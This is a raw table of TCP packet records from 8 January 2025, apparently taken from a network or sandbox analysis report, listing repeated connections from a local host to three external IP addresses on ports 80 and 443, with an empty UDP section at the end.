Jan 8, 2025 15:44:10.034316063 CET	49709	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:10.034347057 CET	49711	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:10.034434080 CET	49711	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:10.039201021 CET	80	49711	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:10.725920916 CET	80	49711	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:10.727338076 CET	49712	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:10.727402925 CET	443	49712	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:10.727480888 CET	49712	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:10.727749109 CET	49712	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:10.727762938 CET	443	49712	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:10.769522905 CET	49711	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:11.211147070 CET	443	49712	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:11.213092089 CET	49712	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:11.213135958 CET	443	49712	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:11.372924089 CET	443	49712	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:11.372987986 CET	443	49712	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:11.373162985 CET	49712	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:11.373524904 CET	49712	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:11.376914024 CET	49711	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:11.377528906 CET	49713	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:11.381931067 CET	80	49711	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:11.382023096 CET	49711	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:11.382301092 CET	80	49713	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:11.382358074 CET	49713	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:11.382435083 CET	49713	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:11.387384892 CET	80	49713	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:12.051609039 CET	80	49713	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:12.052836895 CET	49714	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:12.052898884 CET	443	49714	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:12.052973986 CET	49714	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:12.053221941 CET	49714	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:12.053234100 CET	443	49714	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:12.097482920 CET	49713	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:12.544647932 CET	443	49714	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:12.546241045 CET	49714	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:12.546277046 CET	443	49714	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:12.677844048 CET	443	49714	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:12.677913904 CET	443	49714	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:12.677978992 CET	49714	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:12.678359032 CET	49714	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:12.681646109 CET	49713	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:12.682854891 CET	49715	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:12.686718941 CET	80	49713	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:12.686789036 CET	49713	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:12.687732935 CET	80	49715	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:12.687804937 CET	49715	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:12.687886953 CET	49715	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:12.692677021 CET	80	49715	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:13.367024899 CET	80	49715	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:13.372294903 CET	49716	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:13.372317076 CET	443	49716	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:13.372380018 CET	49716	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:13.372647047 CET	49716	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:13.372658968 CET	443	49716	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:13.425611973 CET	49715	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:13.829510927 CET	443	49716	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:13.831552982 CET	49716	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:13.831589937 CET	443	49716	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:13.959301949 CET	443	49716	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:13.959366083 CET	443	49716	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:13.959429026 CET	49716	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:13.959884882 CET	49716	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:13.962959051 CET	49715	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:13.964056015 CET	49717	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:13.967962027 CET	80	49715	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:13.968040943 CET	49715	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:13.968882084 CET	80	49717	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:13.968971014 CET	49717	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:13.969070911 CET	49717	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:13.973843098 CET	80	49717	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:14.652435064 CET	80	49717	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:14.653783083 CET	49718	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:14.653819084 CET	443	49718	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:14.653877020 CET	49718	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:14.654351950 CET	49718	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:14.654365063 CET	443	49718	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:14.706842899 CET	49717	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:15.140136003 CET	443	49718	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:15.142148972 CET	49718	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:15.142184973 CET	443	49718	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:15.290838003 CET	443	49718	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:15.290901899 CET	443	49718	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:15.290954113 CET	49718	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:15.291347980 CET	49718	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:15.295063972 CET	49717	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:15.296211958 CET	49720	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:15.299982071 CET	80	49717	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:15.300049067 CET	49717	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:15.300981045 CET	80	49720	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:15.301042080 CET	49720	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:15.301491022 CET	49720	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:15.306265116 CET	80	49720	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:15.983721972 CET	80	49720	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:15.988147020 CET	49723	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:15.988190889 CET	443	49723	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:15.988261938 CET	49723	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:15.988507986 CET	49723	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:15.988516092 CET	443	49723	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:16.034991980 CET	49720	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:16.444009066 CET	443	49723	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:16.452186108 CET	49723	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:16.452200890 CET	443	49723	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:16.584253073 CET	443	49723	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:16.584323883 CET	443	49723	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:16.584803104 CET	49723	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:16.589154959 CET	49723	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:16.626176119 CET	49720	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:16.631156921 CET	80	49720	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:16.631206036 CET	49720	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:16.637808084 CET	49726	443	192.168.2.5	149.154.167.220
Jan 8, 2025 15:44:16.637844086 CET	443	49726	149.154.167.220	192.168.2.5
Jan 8, 2025 15:44:16.638158083 CET	49726	443	192.168.2.5	149.154.167.220
Jan 8, 2025 15:44:16.639329910 CET	49726	443	192.168.2.5	149.154.167.220
Jan 8, 2025 15:44:16.639343977 CET	443	49726	149.154.167.220	192.168.2.5
Jan 8, 2025 15:44:17.249553919 CET	443	49726	149.154.167.220	192.168.2.5
Jan 8, 2025 15:44:17.249644995 CET	49726	443	192.168.2.5	149.154.167.220
Jan 8, 2025 15:44:17.252474070 CET	49726	443	192.168.2.5	149.154.167.220
Jan 8, 2025 15:44:17.252479076 CET	443	49726	149.154.167.220	192.168.2.5
Jan 8, 2025 15:44:17.252720118 CET	443	49726	149.154.167.220	192.168.2.5
Jan 8, 2025 15:44:17.254625082 CET	49726	443	192.168.2.5	149.154.167.220
Jan 8, 2025 15:44:17.295334101 CET	443	49726	149.154.167.220	192.168.2.5
Jan 8, 2025 15:44:17.531357050 CET	443	49726	149.154.167.220	192.168.2.5
Jan 8, 2025 15:44:17.531424046 CET	443	49726	149.154.167.220	192.168.2.5
Jan 8, 2025 15:44:17.531735897 CET	49726	443	192.168.2.5	149.154.167.220
Jan 8, 2025 15:44:17.536159992 CET	49726	443	192.168.2.5	149.154.167.220
Jan 8, 2025 15:44:21.338947058 CET	49754	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:21.343846083 CET	80	49754	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:21.343955994 CET	49754	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:21.344120026 CET	49754	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:21.348860025 CET	80	49754	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:22.028577089 CET	80	49754	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:22.032052040 CET	49754	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:22.036942005 CET	80	49754	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:22.242522001 CET	80	49754	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:22.284959078 CET	49754	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:22.285321951 CET	49760	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:22.285358906 CET	443	49760	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:22.285495996 CET	49760	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:22.291323900 CET	49760	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:22.291347027 CET	443	49760	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:22.750050068 CET	443	49760	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:22.750150919 CET	49760	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:22.772335052 CET	49760	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:22.772355080 CET	443	49760	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:22.772644997 CET	443	49760	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:22.827064037 CET	49760	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:23.065418959 CET	49760	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:23.111345053 CET	443	49760	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:23.182949066 CET	443	49760	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:23.183005095 CET	443	49760	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:23.183059931 CET	49760	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:23.186500072 CET	49760	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:23.190187931 CET	49754	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:23.195027113 CET	80	49754	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:23.401701927 CET	80	49754	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:23.403904915 CET	49766	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:23.403959036 CET	443	49766	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:23.404181004 CET	49766	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:23.404447079 CET	49766	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:23.404459000 CET	443	49766	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:23.456845999 CET	49754	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:23.874619007 CET	443	49766	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:23.876554012 CET	49766	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:23.876575947 CET	443	49766	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:24.025563955 CET	443	49766	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:24.025619030 CET	443	49766	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:24.025684118 CET	49766	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:24.026164055 CET	49766	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:24.029853106 CET	49754	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:24.031095982 CET	49772	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:24.034806967 CET	80	49754	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:24.034861088 CET	49754	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:24.035872936 CET	80	49772	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:24.036075115 CET	49772	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:24.036158085 CET	49772	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:24.040893078 CET	80	49772	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:24.706125021 CET	80	49772	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:24.707609892 CET	49778	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:24.707629919 CET	443	49778	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:24.707783937 CET	49778	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:24.708028078 CET	49778	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:24.708040953 CET	443	49778	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:24.753710032 CET	49772	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:25.183023930 CET	443	49778	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:25.185283899 CET	49778	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:25.185305119 CET	443	49778	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:25.385087013 CET	443	49778	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:25.385143042 CET	443	49778	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:25.385425091 CET	49778	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:25.385637999 CET	49778	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:25.389944077 CET	49783	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:25.394752979 CET	80	49783	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:25.394829988 CET	49783	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:25.394895077 CET	49783	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:25.399641037 CET	80	49783	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:26.121742010 CET	80	49783	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:26.122991085 CET	49789	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:26.123030901 CET	443	49789	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:26.123095989 CET	49789	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:26.123332977 CET	49789	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:26.123343945 CET	443	49789	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:26.175616980 CET	49783	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:26.604497910 CET	443	49789	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:26.606028080 CET	49789	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:26.606055021 CET	443	49789	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:26.747402906 CET	443	49789	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:26.747464895 CET	443	49789	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:26.747867107 CET	49789	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:26.748121023 CET	49789	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:26.751363039 CET	49783	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:26.752405882 CET	49795	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:26.756905079 CET	80	49783	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:26.756975889 CET	49783	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:26.757261992 CET	80	49795	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:26.757332087 CET	49795	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:26.757416010 CET	49795	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:26.762162924 CET	80	49795	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:27.431449890 CET	80	49795	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:27.432766914 CET	49801	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:27.432806015 CET	443	49801	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:27.432874918 CET	49801	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:27.433131933 CET	49801	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:27.433146000 CET	443	49801	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:27.472476006 CET	49795	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:27.911875010 CET	443	49801	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:27.913472891 CET	49801	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:27.913503885 CET	443	49801	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:28.073144913 CET	443	49801	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:28.073194027 CET	443	49801	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:28.073308945 CET	49801	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:28.076894999 CET	49801	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:28.080543995 CET	49795	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:28.081692934 CET	49807	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:28.085783005 CET	80	49795	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:28.085942030 CET	49795	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:28.086488008 CET	80	49807	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:28.086558104 CET	49807	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:28.086678028 CET	49807	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:28.091435909 CET	80	49807	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:28.776391983 CET	80	49807	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:28.777627945 CET	49810	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:28.777667999 CET	443	49810	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:28.778100967 CET	49810	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:28.778361082 CET	49810	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:28.778376102 CET	443	49810	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:28.816210032 CET	49807	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:29.234083891 CET	443	49810	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:29.236058950 CET	49810	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:29.236093044 CET	443	49810	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:29.389755964 CET	443	49810	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:29.389826059 CET	443	49810	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:29.390105963 CET	49810	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:29.390368938 CET	49810	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:29.393798113 CET	49807	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:29.394881010 CET	49815	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:29.399208069 CET	80	49807	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:29.399653912 CET	80	49815	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:29.399743080 CET	49807	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:29.399751902 CET	49815	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:29.399910927 CET	49815	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:29.404652119 CET	80	49815	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:30.089771032 CET	80	49815	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:30.091140032 CET	49819	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:30.091171026 CET	443	49819	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:30.091238976 CET	49819	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:30.091546059 CET	49819	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:30.091557026 CET	443	49819	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:30.144342899 CET	49815	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:30.560388088 CET	443	49819	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:30.561856985 CET	49819	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:30.561881065 CET	443	49819	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:30.694627047 CET	443	49819	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:30.695055962 CET	443	49819	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:30.695158005 CET	49819	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:30.695421934 CET	49819	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:30.698555946 CET	49815	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:30.699537992 CET	49825	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:30.704365969 CET	80	49825	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:30.704544067 CET	49825	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:30.704711914 CET	49825	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:30.706604004 CET	80	49815	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:30.706680059 CET	49815	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:30.711678982 CET	80	49825	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:31.375387907 CET	80	49825	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:31.376686096 CET	49830	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:31.376735926 CET	443	49830	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:31.376880884 CET	49830	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:31.377103090 CET	49830	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:31.377116919 CET	443	49830	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:31.425579071 CET	49825	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:31.837018013 CET	443	49830	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:31.862883091 CET	49830	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:31.862900972 CET	443	49830	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:31.982192039 CET	443	49830	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:31.982270956 CET	443	49830	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:31.982395887 CET	49830	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:31.982872009 CET	49830	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:31.985821009 CET	49825	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:31.986886978 CET	49834	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:31.990884066 CET	80	49825	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:31.991127014 CET	49825	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:31.991755009 CET	80	49834	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:31.995101929 CET	49834	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:31.995208979 CET	49834	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:31.999991894 CET	80	49834	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:32.513052940 CET	49707	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:32.812037945 CET	80	49834	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:32.813525915 CET	49838	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:32.813575029 CET	443	49838	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:32.813724041 CET	49838	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:32.814048052 CET	49838	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:32.814065933 CET	443	49838	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:32.863142014 CET	49834	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:33.268978119 CET	443	49838	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:33.270912886 CET	49838	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:33.270951033 CET	443	49838	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:33.424360037 CET	443	49838	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:33.424423933 CET	443	49838	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:33.424529076 CET	49838	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:33.425029993 CET	49838	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:33.434174061 CET	49834	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:33.434959888 CET	49844	443	192.168.2.5	149.154.167.220
Jan 8, 2025 15:44:33.435007095 CET	443	49844	149.154.167.220	192.168.2.5
Jan 8, 2025 15:44:33.435082912 CET	49844	443	192.168.2.5	149.154.167.220
Jan 8, 2025 15:44:33.435611963 CET	49844	443	192.168.2.5	149.154.167.220
Jan 8, 2025 15:44:33.435631990 CET	443	49844	149.154.167.220	192.168.2.5
Jan 8, 2025 15:44:33.439768076 CET	80	49834	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:33.439831018 CET	49834	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:34.041692019 CET	443	49844	149.154.167.220	192.168.2.5
Jan 8, 2025 15:44:34.041821957 CET	49844	443	192.168.2.5	149.154.167.220
Jan 8, 2025 15:44:34.043317080 CET	49844	443	192.168.2.5	149.154.167.220
Jan 8, 2025 15:44:34.043329000 CET	443	49844	149.154.167.220	192.168.2.5
Jan 8, 2025 15:44:34.043555975 CET	443	49844	149.154.167.220	192.168.2.5
Jan 8, 2025 15:44:34.044931889 CET	49844	443	192.168.2.5	149.154.167.220
Jan 8, 2025 15:44:34.091345072 CET	443	49844	149.154.167.220	192.168.2.5
Jan 8, 2025 15:44:34.287908077 CET	443	49844	149.154.167.220	192.168.2.5
Jan 8, 2025 15:44:34.287991047 CET	443	49844	149.154.167.220	192.168.2.5
Jan 8, 2025 15:44:34.288049936 CET	49844	443	192.168.2.5	149.154.167.220
Jan 8, 2025 15:44:34.290657043 CET	49844	443	192.168.2.5	149.154.167.220
Jan 8, 2025 15:44:48.782809973 CET	49772	80	192.168.2.5	132.226.247.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
